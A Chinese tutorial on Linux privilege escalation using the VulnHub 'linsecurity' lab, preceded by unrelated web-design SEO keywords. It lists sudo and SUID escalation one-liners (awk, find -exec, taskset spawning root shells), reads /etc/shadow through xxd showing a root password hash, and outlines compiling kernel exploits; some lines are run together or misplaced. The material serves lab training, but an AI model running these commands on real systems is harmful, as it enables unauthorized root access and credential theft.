龙口网站制作公司,做网站的公司成都,网站优化seo是什么,创意建设机械网站目录
一、linux提权靶场下载与安装
二、基础提权 1.sudo提权 2.suid提权
3.taskset执行bash
三、内核提权 相关网站
https://gtfobins.github.io/#sudohttps://blog.csdn.net/weixin_43873557/article/details/113784146
一、linux提权靶场下载与安装
#下载链接
http…目录
一、linux提权靶场下载与安装
二、基础提权 1.sudo提权 2.suid提权
3.taskset执行bash
三、内核提权 相关网站
https://gtfobins.github.io/#sudohttps://blog.csdn.net/weixin_43873557/article/details/113784146
一、linux提权靶场下载与安装
#下载链接
https://www.vulnhub.com/entry/linsecurity-1,244/用户名密码bob/secret#安装与配置
1.修改默认键盘布局[默认不是美式键盘]
sudo awk BEGIN {system(/bin/sh)}
[修改前\符号是shift2]vim /etc/default/keyboard
[讲XKBLAYOUT改的值为us]setupcon2.配置网卡[Ubuntu 18通过netplan设置网络]
vim /etc/netplan/50-cloud-init.yaml
[将enp0s3改为ens33]netplan apply
二、基础提权 1.sudo提权
sudo权限是root把本来只能超级用户执行的命令赋予普通用户执行
1. sudo /bin/ash
2. sudo find . -exec /bin/sh \;-quit
3. sudo /bin/bashsudo -i 2.suid提权
suid简介SUID这个是uid s的组合s指的是特殊权限。一般情况下用户的权限是3位比如0755这样的特殊权限默认没有配置但是如果超级管理员希望用户在执行一些特殊权限文件时拥有root的权限就会配置特殊权限
使用find命令快速查找所有suid文件
find / -user root -perm -4000 -print 2/dev/nullxxd访问/etc/shadow
-rwsr-x--- 1 root itservices 18552 Apr 10 2018 /usr/bin/xxditservices组具有执行权限通过/etc/group发现susan用户属于itservices用户组利用4.隐藏文件发现的密码登录susan用户进行提权
cd home/susansusanlinsecurity:/home/bob$ xxd /etc/shadow |xxd -r
root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
3.taskset执行bash taskset 是一个用于将进程绑定到特定的CPU核心上的命令 taskset 1 /bin/bash -p 三、内核提权
将linux内核提权速查脚本移到Linux系统中 查询该文件 进行解压缩 进入解压后的文件并执行里面的后缀为.sh的文件 成功后就可以查看推荐的漏洞 将推荐的漏洞下载到本地复制到Linux系统中进行解压缩 进入解压后的文件 存在makefile进行编译make 查看编译后的文件发现新增进行执行该文件 运行文件不能成功则换其他漏洞
